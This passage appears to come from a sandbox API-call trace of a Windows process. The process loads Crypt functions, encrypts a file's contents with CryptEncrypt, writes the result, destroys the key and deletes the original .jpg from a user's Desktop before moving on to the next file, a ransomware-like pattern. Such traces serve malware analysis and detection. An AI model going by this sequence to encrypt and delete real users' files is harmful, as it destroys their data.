wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0132.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0132.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0132.193] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0132.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0132.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0132.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb048 [0132.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0132.193] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0132.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0132.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0132.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392148 [0132.193] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0132.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392148 | out: hHeap=0x1780000) returned 1 [0132.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0132.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafe8 [0132.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0132.193] PeekMessageW (in: lpMsg=0x144e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4dc) returned 0 [0132.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0132.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0132.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0132.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0132.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0132.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0132.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0132.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0132.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0132.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0132.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0132.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0132.194] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0132.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0132.194] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0132.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0132.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392458 [0132.194] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0132.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392458 | out: hHeap=0x1780000) returned 1 [0132.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0132.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb018 [0132.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0132.194] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0132.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0132.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0132.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0132.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0132.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0132.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0132.194] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0132.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0132.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0132.195] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0132.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0132.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0132.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0132.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0132.195] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0132.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0132.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0132.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0132.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0132.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0132.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0132.195] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0132.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0132.195] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0132.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0132.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0132.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0132.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0132.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0132.196] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0132.196] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923e8 | out: hHeap=0x1780000) returned 1 [0132.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0132.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0132.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0132.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0132.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0132.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0132.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0132.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0132.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0132.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0132.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0132.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0132.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0132.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0132.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0132.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0132.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0132.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0132.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0132.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0132.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0132.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0132.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0132.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0132.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0132.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0132.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0132.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0132.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0132.197] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0132.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0132.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0132.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0132.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0132.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0132.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0132.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0132.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0132.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0132.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0132.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0132.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0132.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0132.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0132.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0132.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0132.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0132.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0132.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0132.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0132.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0132.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0132.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0132.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0132.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0132.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0132.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0132.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0132.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0132.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0132.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0132.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0132.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb0a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0132.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0132.199] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0132.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0132.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0132.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0132.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0132.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0132.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0132.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0132.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0132.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0132.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0132.199] CryptEncrypt (in: hKey=0x41ac100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x17606, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x17610) returned 1 [0132.199] CharLowerBuffW (in: lpsz="byte[95761]", cchLength=0xb | out: lpsz="byte[95761]") returned 0xb [0132.215] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.215] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0132.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb3d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0132.215] CryptEncrypt (in: hKey=0x41ac100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48f0048*, pdwDataLen=0x144e538*=0x17606, dwBufLen=0x17610 | out: pbData=0x48f0048*, pdwDataLen=0x144e538*=0x17610) returned 1 [0132.215] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0132.215] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0132.215] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0132.216] WriteFile (in: hFile=0x258, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0x17610, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144ef3c*=0x17610, lpOverlapped=0x0) returned 1 [0132.219] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0132.219] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.219] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0132.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cb078, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0132.219] CryptDestroyKey (hKey=0x41ac100) returned 1 [0132.220] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0132.220] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0132.220] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0132.220] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0132.220] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0132.220] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0132.220] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.220] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0132.220] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0132.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0132.220] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0132.220] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.220] FreeLibrary (hLibModule=0x756e0000) returned 1 [0132.220] CloseHandle (hObject=0x2a0) returned 1 [0132.220] CloseHandle (hObject=0x258) returned 1 [0132.227] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\g6f-14R3g3sZGYbIp.jpg", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\g6f-14R3g3sZGYbIp.jpg", lpFilePart=0x0) returned 0x3a [0132.227] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\g6f-14R3g3sZGYbIp.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\g6f-14r3g3szgybip.jpg")) returned 0x20 [0132.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0132.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0132.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0132.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0132.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0132.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0132.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0132.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0132.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43925a8 [0132.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0132.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0132.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a2f0 [0132.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369e20 [0132.228] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\g6f-14R3g3sZGYbIp.jpg", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x918ea820, ftCreationTime.dwHighDateTime=0x1d5e45b, ftLastAccessTime.dwLowDateTime=0x4b543b90, ftLastAccessTime.dwHighDateTime=0x1d5ef19, ftLastWriteTime.dwLowDateTime=0x4b543b90, ftLastWriteTime.dwHighDateTime=0x1d5ef19, nFileSizeHigh=0x0, nFileSizeLow=0x17606, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="g6f-14R3g3sZGYbIp.jpg", cAlternateFileName="G6F-14~1.JPG")) returned 0x41ac280 [0132.228] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\g6f-14R3g3sZGYbIp.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\g6f-14r3g3szgybip.jpg")) returned 1 [0132.280] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x918ea820, ftCreationTime.dwHighDateTime=0x1d5e45b, ftLastAccessTime.dwLowDateTime=0x4b543b90, ftLastAccessTime.dwHighDateTime=0x1d5ef19, ftLastWriteTime.dwLowDateTime=0x4b543b90, ftLastWriteTime.dwHighDateTime=0x1d5ef19, 